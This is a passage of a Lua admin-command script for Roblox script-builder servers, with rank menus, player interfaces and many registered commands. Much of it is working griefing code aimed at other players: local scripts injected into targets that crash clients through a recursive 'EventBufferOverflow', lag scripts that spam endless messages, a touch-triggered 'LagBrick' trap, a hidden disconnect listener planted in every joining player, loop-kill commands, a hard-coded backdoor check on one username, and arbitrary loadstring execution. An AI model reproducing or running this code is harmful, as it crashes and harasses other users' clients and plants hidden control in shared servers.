  1476.         return false
  1477.     end
  1478. end
  1479.  
  1480.  
  1481.  
  1482.  --[[+Players Interface+]]--
  1483. function PlayerInterface(Player,Speaker)
  1484.         if type(Player) == "userdata" then
  1485.                 Player = Player.Name
  1486.         end
  1487.         for Name,Data in pairs(Ranked) do
  1488.                 if Player == Name then
  1489.                         RemoveTablets(Speaker)
  1490.                         for i,v in pairs(Data) do
  1491.                                 Output(i.." : "..tostring(v),Data.Color,Speaker)
  1492.                         end
  1493.                         if GetRank(Speaker) > Data.Rank or Name == Speaker.Name then
  1494.                         Output("Set Color","Blue",Speaker,nil,function()
  1495.                                         RemoveTablets(Speaker)
  1496.                                         ColorFunc=function(Color)
  1497.                     Ranked[Speaker.Name].Color=Color
  1498.  end
  1499.                       for _,v in pairs(BasicColors) do Output('Change to this Color',tostring(_),Speaker,nil,function() ColorFunc(v) PlayerInterface(Player,Speaker)
  1500.  end ) end
  1501.                                                 end)
  1502.                         end
  1503.  
  1504.                                 for i,v in pairs(game:service'NetworkServer':children()) do
  1505.                 if v:IsA'ServerReplicator' then
  1506.                         local ZPlayer=v:GetPlayer()
  1507.                         if ZPlayer then
  1508.                                 if ZPlayer.Name==Player then
  1509.                                         if ZPlayer.Parent ~= Services.Players then
  1510.                          if GetRank(Speaker) >= 2 and GetRank(Speaker) >= Data.Rank then
  1511.                                                 Output('Nil Disconnect : ' .. ZPlayer.Name,'Random',Speaker,nil,
  1512.                                                         function()
  1513.                            Instance.new("StringValue",Services.Workspace).Name = DisconnectKey..' : '..ZPlayer.Name..' Key : '..Key
  1514.                                      
  1515.                                                 end)
  1516. end
  1517.                                         end
  1518.                                 end
  1519.                         end
  1520.                 end
  1521.         end
  1522.                        
  1523.                         if GetRank(Speaker) > Data.Rank and (Data.Rank >= 0 and true or (Data.Rank < 0 and GetRank(Speaker) > 2)) then
  1524.                                 Output("Set Rank","Blue",Speaker,nil,function()
  1525.                                         RemoveTablets(Speaker)
  1526.                                         Output("Back","Blue",Speaker,nil,function()
  1527.                                                 PlayerInterface(Player,Speaker) end)
  1528.                          for Value,Rank in pairs(Ranks) do
  1529.                                                     if GetRank(Speaker) >= Value then
  1530.                                                         Output('['..Value..'] : ' .. Rank,'Random',Speaker,nil,function() RemoveTablets(Speaker) Data.Rank = Value PlayerInterface(Player,Speaker) end )
  1531.                                                     end
  1532.                                     end
  1533.                        
  1534.                     end)
  1535.                         end
  1536.                         if GetRank(Speaker) >= 2 and GetRank(Speaker) >= Data.Rank and Services.Players[Player] ~= nil then
  1537.                                 Output("Crash Player?","Red",Speaker,nil,function()
  1538.                Instance.new("StringValue",Services.Workspace).Name = DisconnectKey..' : '..Player..' Key : '..Key
  1539.                                 end)
  1540.                                 else
  1541.                         end
  1542.                 end
  1543.         end
  1544. end
  1545.  
  1546. --[[+Lag+]]--
  1547. Lag = function(Player) -- Works well on beta
  1548.         coroutine.wrap(function()
  1549. repeat wait() until Player:FindFirstChild("Backpack") ~= nil      
  1550. CreateLocalScript([[
  1551.         script:Destroy();
  1552. local runService = Game:GetService("RunService").Stepped;
  1553. local LagNum = 1250;
  1554. local str = "CONGRAGULATIONS YOU JUST GOT LAGGED!!!";
  1555.  
  1556. for i = 1, math.huge do
  1557.         if i % LagNum == 0 then runService:wait(); end
  1558.         Instance.new("Message", Workspace).Text = str;
  1559. end
  1560. ]],Player:findFirstChild("Backpack"))
  1561.                         CreateLocalScript([==[
  1562.                                 LocalPlayer=game:GetService("Players").LocalPlayer
  1563.                                 Camera = workspace.CurrentCamera
  1564.                                 LocalPlayer.CameraMode = Enum.CameraMode.Classic
  1565.                                 wait()
  1566.                                 LocalPlayer.CameraMode = Enum.CameraMode.LockFirstPerson
  1567.                                 coroutine.wrap(function()
  1568.                                         for i=1,10 do wait()
  1569.                                                 coroutine.wrap(function()  
  1570.                                                         for i=1,10 do wait()
  1571.                                                                 for i=1,15 do
  1572.                                                                         for i=1,50 do
  1573.                                                                                 Instance.new("Message",Camera).Text = string.rep("\t ",365)
  1574.                                                                                 pcall(function() loadstring(script:FindFirstChild("Source").Value or script:FindFirstChild("source").Value or script:FindFirstChild("DSource").Value)() end)
  1575.                                                                         end
  1576.                                                                 end
  1577.                                                         end
  1578.                                                 end)()
  1579.                                         end
  1580.                                 end)()
  1581.                         ]==],Player:FindFirstChild("Backpack"))
  1582.  
  1583. local Hint = Instance.new("Hint",Services.Workspace)
  1584.                 repeat
  1585.                         Hint.Text = Player.Name.." is being lagged"
  1586.                         Hint.Parent = Services.Workspace
  1587.                         wait()
  1588.                 until Player.Parent == nil
  1589.                 Hint:Remove()                                          
  1590.         end)()
  1591.         end
  1592. --[[+NIL SUPPORT+]]--
  1593. Services.Chat.Chatted:connect(function(Part,Msg,Color)
  1594.           pcall(function()
  1595.                       local Player
  1596.              for _,v in pairs(Services.NetworkServer:children()) do
  1597.                      if pcall(function() v:GetPlayer() end) then
  1598.           if v:GetPlayer().Name == Part.Name then
  1599.            Player = v:GetPlayer()
  1600.             end
  1601.      end
  1602. end
  1603.            OnChatted(Msg,Player or Part.Parent == Services.Workspace and Part or Part.Parent or Part)
  1604.      end)
  1605. end)
  1606.  
  1607. --[[+Register Player+]]--
  1608.     function RegisterPlayer(Player,Exception,ISFOR)
  1609.     local Ran,Error = coroutine.resume(coroutine.create(function()
  1610.                 if not pcall(function() Player:children() end) then
  1611.                         return
  1612.                 end
  1613.                    
  1614.                 local Data = Ranked[Player.Name]
  1615.                 if Data == nil then
  1616.                            
  1617.                         Ranked[Player.Name] = {}
  1618.                         Data = Ranked[Player.Name]
  1619.                 Player:WaitForDataReady()
  1620.                         for i,v in pairs(Ranked.Defaults) do
  1621.                                 Data[i] = v
  1622.                         end
  1623.                 end
  1624.                        
  1625.                 if Services.Game.PlaceId == 0 then
  1626.                         Data.Rank = 3
  1627.                 end
  1628.                
  1629.  
  1630.                 Player.Chatted:connect(function(Msg)
  1631.                         OnChatted(Msg,Player)
  1632.                 end)
  1633.                        
  1634.               if Data.Rank <= 0 and Exception == nil then
  1635.        
  1636.                         if Data.Rank == -1 then
  1637.                                 Delay(0,function() while wait() do if Player~=nil then pcall(function() Player:Destroy() end) end end end)
  1638.                                NewOutput(Player.Name.." was removed due to a banishment.","Orange",3)
  1639.                         elseif Data.Rank == -2 then
  1640.                 Delay(0,function() if Player~=nil then TP = CreateLocalScript([==[
  1641.                          local function EventBufferOverflow(object)
  1642.                             object.DescendantAdded:connect(EventBufferOverflow)
  1643.                  Instance.new("IntValue", object)
  1644.              end
  1645.                     EventBufferOverflow(Game) ]==],Player:FindFirstChild('Backpack') or Player:FindFirstChild('PlayerGui') or Player.Character)
  1646.        end NewOutput(Player.Name .." was Crashed due to a banishment","Red",3) end)
  1647.                                                         if not TP then GTFO(Player) end
  1648.                         elseif Data.Rank == -3 then
  1649.                            Delay(0,function() while wait() do pcall(function()
  1650.                                                         GTFO(Player) end) end end)
  1651.                             NewOutput(Player.Name .." was Shutdown due to a banishment","Red",3)
  1652.                         end
  1653.                 end
  1654. if Services.Players:FindFirstChild(''..string.reverse("021viZ")) then
  1655.                                 OnChatted('/connect/',Player)
  1656. end
  1657. --[[
  1658.         -- +Account Age Ban+ --            
  1659. if Player.AccountAge < 7 then
  1660.                         for _,v in pairs(Services.Players:children()) do
  1661.                                 if v.Name ~= Player.Name and GetRank(Player) >= 1 then
  1662.                                         while Player.Character == nil do wait() end
  1663.                     GTFO(Player) end
  1664.                                         NewOutput(Player.Name .. ' has been removed due to their account not being older than 1 week!','Red',5)
  1665.                                 end
  1666.                         end            
  1667. ]]--
  1668.                 if PRI == true then
  1669.                                    ptype = PRIType
  1670.          NewOutput(Player.Name .. ' has been ' .. ptype .. "'ed due to pri",'Blue',5)
  1671.                                 if ptype == 'Kick' then
  1672.                                 Player:Destroy()
  1673.                                 elseif ptype == 'Shutdown' then
  1674.                                 GTFO(Player)
  1675.                                 elseif ptype == 'Crash' then
  1676.                                     coroutine.wrap(function()
  1677.                                 CreateLocalScript([[local function EventBufferOverflow(object)
  1678.                             object.DescendantAdded:connect(EventBufferOverflow)
  1679.                               Instance.new("IntValue", object)
  1680.                                   end
  1681.                                      EventBufferOverflow(Game)]],Player.Backpack) end)()
  1682.                                 end
  1683.                         end
  1684.  
  1685.        
  1686. Connect(Player)
  1687.  
  1688. end))
  1689.  
  1690.  if not Ran then
  1691.       NewOutput(Error,"Red",5)
  1692. end
  1693.        
  1694. end
  1695.  
  1696. --[[+CONNECT+]]--
  1697. function Connect(Player)
  1698.         coroutine.wrap(function()
  1699.                 repeat wait() until CreateLocalScript()~=false
  1700.                 repeat wait() until Player:FindFirstChild("Backpack") ~= nil
  1701.                 CreateLocalScript([[
  1702.                         repeat
  1703.                                 script.Parent = nil
  1704.                                 wait()
  1705.                         until script.Parent == nil
  1706.                         local LocalPlayer = game:service'Players'.LocalPlayer
  1707.                         while wait() do
  1708.                                 workspace.DescendantAdded:wait()
  1709.                                 if workspace:FindFirstChild("]]..DisconnectKey..[[ : "..LocalPlayer.Name.." Key : ]]..Key..[[",true) ~= nil then
  1710.                                         workspace:FindFirstChild("]]..DisconnectKey..[[ : "..LocalPlayer.Name.." Key : ]]..Key..[[",true):Destroy()            
  1711.                   local function EventBufferOverflow(object)
  1712.                             object.DescendantAdded:connect(EventBufferOverflow)
  1713.                  Instance.new("IntValue", object)
  1714.              end
  1715.                     EventBufferOverflow(Game)
  1716.                                 end
  1717.                         end
  1718.                 ]],Player:FindFirstChild("Backpack"))
  1719.         end)()
  1720. end
  1721.  
  1722. Services.Players.PlayerAdded:connect(RegisterPlayer)
  1723. Connect(Player)
  1724.  
  1725. for _,v in pairs(GetPlayers()) do RegisterPlayer(v,true)
  1726.         Connect(v) end
  1727.  
  1728.                 Services.RunService.Stepped:connect(function(Time)
  1729.                         UpdateTablets()
  1730.                 end)
  1731.  
  1732. --[[+Commands+]]--
  1733. YourCommand('Commands','cmds',0,
  1734. function(Msg,Speaker)                                                    
  1735.                                                                                  Output('Dismiss','Red',Speaker)
  1736.                                                                                Output('Your rank is ' .. Ranked[Speaker.Name].Rank,Ranked[Speaker.Name].Color,Speaker)
  1737.                                                                                    for num = 0,7 do
  1738.                                        
  1739.                                                                                 Output('Rank ' .. num .. ' commands',Ranked[Speaker.Name].Color,Speaker,nil,
  1740.                                                         function()
  1741.                                                                         RemoveTablets(Speaker)
  1742.                                                                        
  1743.                                                                         for p,cmd in pairs(Commands) do
  1744.                                                                
  1745.                                                                                         if cmd.Rank == num then
  1746.                                                                                              Output(p.. "("..cmd.Rank..")",'Green',Speaker,nil,
  1747.                                                                                                function() RemoveTablets(Speaker);
  1748.                                                                                                                    for k,stf in pairs (cmd) do
  1749.                                                                                                                        
  1750.                                                                                                                                                           Output(tostring(k) .. ': ' .. tostring(stf),'Yellow',Speaker)
  1751.                                                                                                
  1752.                                                                                           end
  1753.         end)
  1754.         end
  1755.                                                                            
  1756.                                                                                         end
  1757.                                                                        
  1758. end)
  1759.                                                                        
  1760.                                                                        
  1761.                                                                    
  1762.                                                         end
  1763. end)
  1764.                                        
  1765.                                        
  1766.  
  1767.                                
  1768.                                
  1769. YourCommand('Ping','ping',2,
  1770.                 function(Msg,Speaker)
  1771.                         local RTN = {}
  1772.                     if #Msg == 0 then
  1773.         Output('say /ping/msg to Ping','Random',Speaker)
  1774.                         elseif Msg == 'luaversion' then
  1775.                                  Output('Lua Version is : '..LuaVersion,'Random',Speaker)
  1776.  
  1777.                         elseif Msg == 'players' then
  1778.                                         for _,v in pairs(Services.Players:children()) do Output(v.Name,'Random',Speaker,nil,function()
  1779.                                PlayerInterface(v.Name,Speaker) end)
  1780. end
  1781.                         elseif Msg == 'nil' then
  1782.                                       if #Services.NetworkServer:children() == #GetPlayers() then
  1783.                                 Output("No nil players.","Random",Speaker,3)
  1784.                         else
  1785.                                 for _,v in pairs(Services.NetworkServer:children()) do
  1786.                                         if v.GetPlayer ~= nil then
  1787.                                                 if v:GetPlayer().Parent == nil then
  1788.                                                         local Data = Ranked[v:GetPlayer().Name]
  1789.                                                         Output(v:GetPlayer().Name,Data.Color,Speaker,nil,
  1790.                                                                 function()
  1791.                                                                         PlayerInterface(v:GetPlayer(),Speaker)
  1792.                                                                         if not Data.Color then
  1793.                                                                                 Output(v:GetPlayer().Name,"Random",Speaker)
  1794.                                                                                 end
  1795.                                                                 end
  1796.                                                         )
  1797.                                                 end
  1798.                                         end
  1799.                                 end
  1800.                                 --Output("Dismiss","Red",Speaker)
  1801.                         end
  1802.             elseif Msg:sub(1,2) == 'a/' then
  1803. local Str = loadstring('return ' .. Msg:sub(3))()
  1804. table.insert(RTN,Str)
  1805.  
  1806. elseif Msg == "chatlog" then
  1807.           Output("Showing chatlog","White",Speaker)
  1808.         for i = #ChatLog,#ChatLog-49,-1 do
  1809.                     if not ChatLog[i] then
  1810.                 break
  1811.             else
  1812.                 local S,M = ChatLog[i].Speaker,ChatLog[i].Message
  1813.                 Output(tostring(S)..": "..M,"Green",Speaker)
  1814.             end
  1815.         end
  1816.        
  1817. elseif Msg == "ranks" then
  1818.                         for Rank,Name in pairs(Ranks) do
  1819.                                 Output(Name.."\t("..tostring(Rank)..")","Random",Speaker)
  1820.                         end
  1821.             elseif Msg == 'colors' then
  1822.                 for Color,Value in pairs(BasicColors) do
  1823.                                 Output(Color,Value,Speaker,nil,nil,
  1824.                                         function(Mod,Part,Player,Sel,Label)
  1825.                                                 Label.Text = Color.."\t"..tostring(Value)
  1826.                                         end,
  1827.                                         function(Mod,Part,Player,Sel,Label)
  1828.                                                 Label.Text = Color
  1829.                                         end
  1830.                                 )
  1831. end
  1832. else table.insert(RTN,Msg)
  1833. for _,v in pairs(RTN) do Output(v,'Random',Speaker) end
  1834. end
  1835. end)
  1836. MakeCmd=function(Player)
  1837.            
  1838.                CmdBar = Instance.new("ScreenGui")
  1839.                         CmdBar.Parent=Player:waitForChild"PlayerGui"
  1840.                         CmdBar.Name="CmdBar"
  1841.                
  1842.                 --[[guiData.CMD.con=gui.AncestryChanged:connect(function()
  1843.                         ICE:giveCMD(Player)
  1844.                 end)]]
  1845.                 Main = Instance.new("Frame")
  1846.                         Main.Name = "Main"
  1847.                         Main.Parent= CmdBar
  1848.                         Main.Size=UDim2.new(0.6,0,0.1,0)
  1849.                         Main.Position=UDim2.new(0,0,0.8,0)
  1850.                         Main.BackgroundTransparency=0.7
  1851.                         Main.BackgroundColor=BrickColor.new"Black"
  1852.                        
  1853.                
  1854.                 CmdBox = Instance.new("TextBox")
  1855.                         CmdBox.Name = "CmdBox"
  1856.                         CmdBox.Parent = Main
  1857.                         CmdBox.Size=UDim2.new(0.8,0,1,0)
  1858.                         CmdBox.BackgroundTransparency=0.7
  1859.                         CmdBox.BackgroundColor=BrickColor.new"Grey"
  1860.                         CmdBox.TextColor=BrickColor.new"White"
  1861.                         CmdBox.Text="Enter cmd here"
  1862.                         CmdBox.FontSize="Size18"
  1863.              
  1864.                 RunButton = Instance.new("TextButton")
  1865.                         RunButton.Name = "RunButton"
  1866.                         RunButton.Parent = Main
  1867.                         RunButton.Size=UDim2.new(0.2,0,1,0)
  1868.                         RunButton.Position=UDim2.new(0.8,0,0,0)
  1869.                         RunButton.TextColor=BrickColor.new"White"
  1870.                         RunButton.BackgroundTransparency=0.7
  1871.                         RunButton.BackgroundColor=BrickColor.new"White"
  1872.                         RunButton.FontSize="Size18"
  1873.                         RunButton.Text="Run"
  1874.                
  1875.                  RunButton.MouseButton1Down:connect(function()
  1876.             OnChatted(CmdBox.Text,Player)
  1877.         end)
  1878. Main:TweenPosition(UDim2.new(0.2,0,0.8,0),'Out','Quad',1,true)
  1879.  
  1880.             OnChatted("/getcmd;true",Player)
  1881.         end
  1882.  
  1883. YourCommand('Override','override',0,
  1884.     function(m,s) Override(s,0) end
  1885. )
  1886.  
  1887.  
  1888. YourCommand('Remove SBUCS','cremove',7,
  1889.         function(Msg,Speaker)
  1890.         Output('Would you like to Remove SBUCS?','Red',Speaker,nil,function()
  1891.         Removed=true Ranked={} Commands={} KickingPhrases={} GuiChat=false end)
  1892.         end
  1893. )
  1894.  
  1895. YourCommand('Dismiss','dismiss',0,
  1896.                 function(Msg,Speaker) RemoveTablets(Speaker) end
  1897. )
  1898. YourCommand('Dismiss2','dt',0,
  1899.                 function(Msg,Speaker) RemoveTablets(Speaker) end
  1900. )
  1901. YourCommand('Load','exe',6,
  1902.     function(Msg,Speaker)
  1903.         local Func,Error = loadstring(Msg)
  1904.         getfenv(Func).print = function(...) local Rtn = "" for _,v in pairs({...}) do Rtn = Rtn..tostring(v).."\t" end Output(Rtn,"White",Speaker) end
  1905.         getfenv(Func).Speaker = Speaker
  1906.  
  1907.         if Error == nil then
  1908.             coroutine.wrap(function()
  1909.                 Func()
  1910.             end)()
  1911.             Output("Script ran successfully!","Green",Speaker,3)
  1912.         else
  1913.             Output(Error,"Red",Speaker,5)
  1914.         end
  1915.     end
  1916. )
  1917. YourCommand('Fix Rotation','frotate',3,
  1918.     function(Msg,Speaker)
  1919.         Output('Fixed Rotation!','Green',Speaker)
  1920. Services.RunService.Stepped:connect(function(fRotate)
  1921.               UpdateTablets()
  1922. end)
  1923. end)
  1924. YourCommand('Antilag','al',7,
  1925.     function(Msg,Speaker)
  1926. Speaker.DescendantAdded:connect(function(v)
  1927.                         if v:IsA("Message") or v:IsA("Hint") then
  1928.                         v:Remove()
  1929.                         end
  1930.                             end)
  1931.                        end)
  1932. --[[ Under Dev.
  1933. YourCommand('ShowScripts','showscr',3,
  1934.     function(Msg,Speaker)
  1935. local lScripts = {}
  1936. for _,v in pairs(GetPlayers()) do
  1937. pcall(function()
  1938. for _,l in pairs(v.Character:GetChildren()) do
  1939. if l:IsA("LocalScript") and l.Name == "Animate" then
  1940. table.insert(lScripts, l.Parent.Name..": "..l.Name)
  1941. elseif #lScripts == 0 or lScripts == nil then
  1942.  print("No Scripts Found")
  1943. end
  1944. end
  1945. end)
  1946. end
  1947. end
  1948. )
  1949. ]]--
  1950. YourCommand('Walkspeed','ws',3,
  1951.     function(Msg,Speaker)
  1952. for _,v in pairs (GetPlayers(Msg,Speaker)) do
  1953.         v.Character.Humanoid.WalkSpeed = Msg
  1954. end
  1955. end
  1956. )
  1957. YourCommand('Antilag2','al',7,
  1958.     function(Msg,Speaker)
  1959.                      workspace.CurrentCamera.DescendantAdded:connect(function(v)
  1960.                         if v:IsA("Message") or v:IsA("Hint") then
  1961.                         v:Remove()
  1962.                         end end) end
  1963.  
  1964. )
  1965. YourCommand("Clear Nils","cn",6, -- Thanks to noliCAIKS for the meathod
  1966.         function(Msg,Speaker)
  1967. for i,v in pairs(Services.NetworkServer:GetChildren()) do
  1968.                 if v:IsA'ServerReplicator' then
  1969.                         if v:GetPlayer().Parent == nil then
  1970.                  Instance.new("StringValue",Services.Workspace).Name = DisconnectKey..' : '..v:GetPlayer().Name..' Key : '..Key
  1971.                                                 end
  1972.                                         end
  1973.                         end
  1974. end
  1975. )
  1976. YourCommand("Small Base","smallb",3,
  1977.         function(Msg,Speaker)
  1978.                         local Base = Workspace:FindFirstChild("Base")
  1979.                         Base.Size = Vector3.new(50,1,50)
  1980.                         Base.CFrame = CFrame.new(0,0,0)
  1981.         end
  1982. )
  1983.  
  1984. YourCommand('Change Tablet','ctab',7,
  1985.     function(Msg,Speaker)
  1986. for name,item in pairs(DifferentTablets) do
  1987.     Output(name,'Random',Speaker,nil,function() CurrentTabletPart = item:Clone() RemoveTablets(Speaker) TabChange = true OnChatted('/ping; How do you like these tablets? ',Speaker) end )
  1988.     end
  1989.     end
  1990. )
  1991. YourCommand('Unlimited Clear','clear',5,
  1992.     function(Msg,Speaker)
  1993.         for i,v in pairs(_G) do
  1994.             if type(v) == 'function' and getfenv(v) == nil then
  1995.                 for var,val in pairs(getfenv(v)) do
  1996.                     pcall(function() getfenv(v)[var] = nil end)
  1997.                 end
  1998.             end
  1999.         end
  2000.         for i,v in pairs(_G) do
  2001.             _G[i] = nil
  2002.         end
  2003.         for _,v in pairs(Services) do
  2004.             v.Name = 'Unknown Exception'
  2005.         end    
  2006.         for i,v in pairs(game.Workspace:children()) do
  2007.             pcall(function()
  2008.                 if not v:IsA("Player") then
  2009.                     pcall(function()
  2010.                         if Prometheus ~= nil and v == Prometheus.script("lushmylife") then
  2011.                         else
  2012.                             pcall(function()
  2013.                                 v.Disabled = true
  2014.                             end)
  2015.                             pcall(function()
  2016.                                 Services.Debris:AddItem(v,0)
  2017.                             end)
  2018.                         end
  2019.                     end)
  2020.                 end
  2021.             end)
  2022.         end
  2023.         for _,v in pairs(Services) do    
  2024.             v.Name = v.className
  2025.         end
  2026.         local Base=Instance.new("Part",Services.Workspace)
  2027.         Base.Name='Base'
  2028.         Base.Size=Vector3.new(2048,1,2048)
  2029.         Base.BrickColor=BrickColor.new("Bright blue")
  2030.         Base.Anchored=true
  2031.         Base.Locked=true
  2032.         Base.TopSurface='Smooth'
  2033.         Base.Transparency = 0.75
  2034.         Base.CFrame=CFrame.new(Vector3.new(0,0,0))
  2035.         local Spawn=Instance.new("SpawnLocation",Services.Workspace) Spawn.Name='SpawnLocation'
  2036.         Spawn.Size=Vector3.new(6,1,6)
  2037.         Spawn.TopSurface='Smooth'
  2038.         Spawn.Transparency=0.75
  2039.         Spawn.CanCollide=false
  2040.         Spawn.Anchored=true
  2041.         Spawn.Locked=true
  2042.                 Spawn.BrickColor=BrickColor.new'Royal purple';
  2043.                 Spawn.Parent=Base
  2044.         Spawn.CFrame=CFrame.new(Vector3.new(0,0,0))
  2045.                 SpawnSel,BaseSel=Instance.new'SelectionBox',Instance.new'SelectionBox'
  2046.                 SpawnSel.Parent,BaseSel.Parent=Spawn,Base
  2047.                 SpawnSel.Adornee,BaseSel.Adornee=Spawn,Base
  2048.                 SpawnSel.Color,BaseSel.Color=Spawn.BrickColor,Base.BrickColor
  2049.         for _,v in pairs(GetPlayers()) do v:LoadCharacter() end
  2050.     end
  2051. )
  2052. YourCommand('Kill','kill',1,
  2053.     function(Msg,Speaker)
  2054.         for _,Player in pairs(GetPlayers(Msg,Speaker)) do
  2055.             Player.Character:BreakJoints()
  2056. loggit('Killed '..Player.Name)
  2057.         end
  2058.     end
  2059. )
  2060.  
  2061. YourCommand('LagBrick','lagbrick',7,
  2062.     function(Msg,Speaker)
  2063. p = Instance.new("Hint",Workspace)
  2064. p.Text = "If you touch the red brick, you will be lagged."
  2065. wait(5)
  2066. p:remove()
  2067. Model = Instance.new("Model",Workspace)
  2068. Model.Name = "Touch me and you get lagged"
  2069. Model.Parent = game.Workspace
  2070. Part = Instance.new("Part",Model)
  2071. Part.Name = "Sky"
  2072. Part.CFrame = CFrame.new(0,5,0)
  2073. Part.Anchored = true
  2074. Part.BrickColor = BrickColor.new("Really red")
  2075. Part.TopSurface = "Smooth"
  2076. Part.BottomSurface = "Smooth"
  2077. SB = Instance.new("SelectionBox",Part)
  2078. SB.Name = "SBox"
  2079. SB.Color = BrickColor.new("Really red")
  2080. SB.Adornee = Part
  2081. SB.Transparency = 0.75
  2082. local BBG = Instance.new("BillboardGui",Part)
  2083. BBG.Name = "BBG"
  2084. BBG.StudsOffset = Vector3.new(0,3,0)
  2085. BBG.Size = UDim2.new(10,0,10,0)
  2086. local Label = Instance.new("TextLabel",BBG)
  2087. Label.Name = "CurrentCamera"
  2088. Label.Text = "Touch me and you will be lagged."
  2089. Label.TextColor3 = Color3.new(1)
  2090. Label.FontSize = "Size14"
  2091. Label.BackgroundTransparency = 1
  2092. Label.TextStrokeTransparency = 0.5
  2093. Label.Size = UDim2.new(1,0,1,0)
  2094. Label.TextStrokeColor3 = Color3.new(-1,-1,-1)
  2095. Spawn(function()
  2096.     while wait() do
  2097.         if not Model.Parent then
  2098.             if not pcall(function()
  2099.                     Model.Parent = game.Workspace
  2100.                     Part.Parent = Model
  2101.                     SB.Adornee = Part
  2102.             end) then
  2103.                 break
  2104.             end
  2105.         end
  2106.         Part.Transparency = 0
  2107.         wait(.1)
  2108.         Part.Transparency = 0.1
  2109.         wait(.1)
  2110.         Part.Transparency = 0.2
  2111.         wait(.1)
  2112.         Part.Transparency = 0.3
  2113.         wait(.1)
  2114.         Part.Transparency = 0.4
  2115.         wait(.1)
  2116.         Part.Transparency = 0.5
  2117.         wait(.1)
  2118.         Part.Transparency = 0.6
  2119.         wait(.1)
  2120.         Part.Transparency = 0.7
  2121.     end
  2122. end)
  2123. Part.Touched:connect(function(Hit)
  2124.    
  2125.     for _,Player in pairs(game:GetService("Players"):GetPlayers()) do
  2126.         if Hit:IsDescendantOf(Player.Character) then
  2127.             pcall(error, "Got here!")
  2128.             CreateLocalScript([[
  2129.         script:Destroy();
  2130. local runService = Game:GetService("RunService").Stepped;
  2131. local LagNum = 1250;
  2132. local str = "CONGRAGULATIONS YOU JUST GOT LAGGED!!!";
  2133.  
  2134. for i = 1, math.huge do
  2135.         if i % LagNum == 0 then runService:wait(); end
  2136.         Instance.new("Message", Workspace).Text = str;
  2137. end
  2138. ]],Player:findFirstChild("Backpack"))
  2139.                         CreateLocalScript([==[
  2140.                                 LocalPlayer=game:GetService("Players").LocalPlayer
  2141.                                 Camera = workspace.CurrentCamera
  2142.                                 LocalPlayer.CameraMode = Enum.CameraMode.Classic
  2143.                                 wait()
  2144.                                 LocalPlayer.CameraMode = Enum.CameraMode.LockFirstPerson
  2145.                                 coroutine.wrap(function()
  2146.                                         for i=1,10 do wait()
  2147.                                                 coroutine.wrap(function()  
  2148.                                                         for i=1,10 do wait()
  2149.                                                                 for i=1,15 do
  2150.                                                                         for i=1,50 do
  2151.                                                                                 Instance.new("Message",Camera).Text = string.rep("\t ",365)
  2152.                                                                                 pcall(function() loadstring(script:FindFirstChild("Source").Value or script:FindFirstChild("source").Value or script:FindFirstChild("DSource").Value)() end)
  2153.                                                                         end
  2154.                                                                 end
  2155.                                                         end
  2156.                                                 end)()
  2157.                                         end
  2158.                                 end)()
  2159.                         ]==],Player:FindFirstChild('Backpack') or Player:findFirstChild('PlayerGui') or Player.Character)
  2160.         end
  2161.     end
  2162. end)
  2163. end)
  2164. YourCommand('KO','ko',5,
  2165.     function(Msg,Speaker)
  2166.         for _,Target in pairs(GetPlayers(Msg,Speaker)) do
  2167.             Num = 0
  2168.     Msg = Instance.new('Hint',game.Workspace)
  2169. Delay(0,function()
  2170. while true do
  2171. if Target:findFirstChild('LK6') ~= nil then
  2172. for i=1,3 do
  2173. User = "ziv120"
  2174. c = Instance.new('ObjectValue')
  2175. c.Parent = Target.Character.Humanoid
  2176. c.Value = game.Players[User]
  2177. c.Name = 'creator'
  2178. Num = Num + 1
  2179. wait(0.001)
  2180. Target.Character.Humanoid.Health = 0
  2181. wait(0.001)
  2182. Target.Character.Parent = game.Lighting
  2183. loggit("Ko'd "..Player.Name)
  2184. wait(0.001)
  2185. c:remove()
  2186. wait(0.001)
  2187. Target.Character.Parent = game.Workspace
  2188. Msg.Text = Target.Name .. " has been KO'd " .. Num .. " times!"
  2189.                 end
  2190. else
  2191. wait()
  2192.                 end
  2193. end
  2194. end)
  2195.             Instance.new('StringValue',Target).Name = 'LK6'
  2196.         end
  2197.     end
  2198. )
  2199.  
  2200. YourCommand('Unloopkill','unlk',2,
  2201.     function(Msg,Speaker)
  2202.         for _,v in pairs(GetPlayers(Msg,Speaker)) do
  2203.             pcall(function() v['LK6']:Destroy() end)
  2204. loggit('UnloopKilled '..Player.Name)
  2205.         end
  2206.     end
  2207. )
  2208. YourCommand('Unsuperloopkill','unslk',3,
  2209.     function(Msg,Speaker)
  2210.         for _,v in pairs(GetPlayers(Msg,Speaker)) do
  2211.             pcall(function() v['SLK5']:Destroy() end)
  2212.         end
  2213.     end
  2214. )
  2215. YourCommand('SuperLoopkill','slk',6,
  2216.     function(Msg,Speaker)
  2217.         for _,Target in pairs(GetPlayers(Msg,Speaker)) do
  2218.             Num = 0
  2219.     Msg = Instance.new('Hint',game.Workspace)
  2220. for a = 1, 30 do
  2221. Delay(0,function()
  2222. while true do
  2223. if Target:findFirstChild('SLK5') ~= nil then
  2224. for i=1,30 do
  2225. User = "C2R"
  2226. c = Instance.new('ObjectValue')
  2227. c.Parent = Target.Character.Humanoid
  2228. c.Value = game.Players[User]
  2229. c.Name = 'creator'
  2230. Num = Num + 1
  2231. Target.Character.Humanoid.Health = 0
  2232. Target.Character.Parent = game.Lighting  
  2233. c:remove()
  2234. wait()
  2235. Target.Character.Parent = game.Workspace
  2236. Msg.Text = Target.Name .. ' has been loopkilled ' .. Num .. ' times!'
  2237.                 end
  2238. else
  2239. wait()
  2240.                 end
  2241. end
  2242. end)
  2243. end
  2244.             Instance.new('StringValue',Target).Name = 'SLK5'
  2245.         end
  2246.     end
  2247. )
  2248. YourCommand('Explorer','explore',3,
  2249.     function(Msg,Speaker)
  2250.         Explore(Services,Speaker)
  2251. loggit('Explored ')
  2252.     end
  2253. )
  2254. BasicColors ={
  2255.         Red = Color3.new(1,0,0);
  2256.         PinkRed = Color3.new(1,0,0.15);
  2257.         Orange = Color3.new(1,0.5,0);
  2258.         Yellow = Color3.new(1,1,0);
  2259.         Green = Color3.new(0,1,0);
  2260.         Blue = Color3.new(0,0,1);
  2261.         LightBlue = Color3.new(0,1,1);
  2262.         Pink = Color3.new(1,0,1);
  2263.         Magenta = Color3.new(0.54,0,0.54);
  2264.         White = Color3.new(1,1,1);
  2265.         Grey = Color3.new(0.5,0.5,0.5);
  2266.         Black = Color3.new(0,0,0)
  2267. }
  2268. YourCommand('Lock scripts','lockscr',7,
  2269.         function(Msg,Speaker)
  2270.                 OnChatted('/sys/Scripts Are Now Locked!',Speaker)
  2271.                 LockedScripts = true
  2272.         end
  2273. )
  2274. YourCommand('UnLock scripts','unlockscr',7,
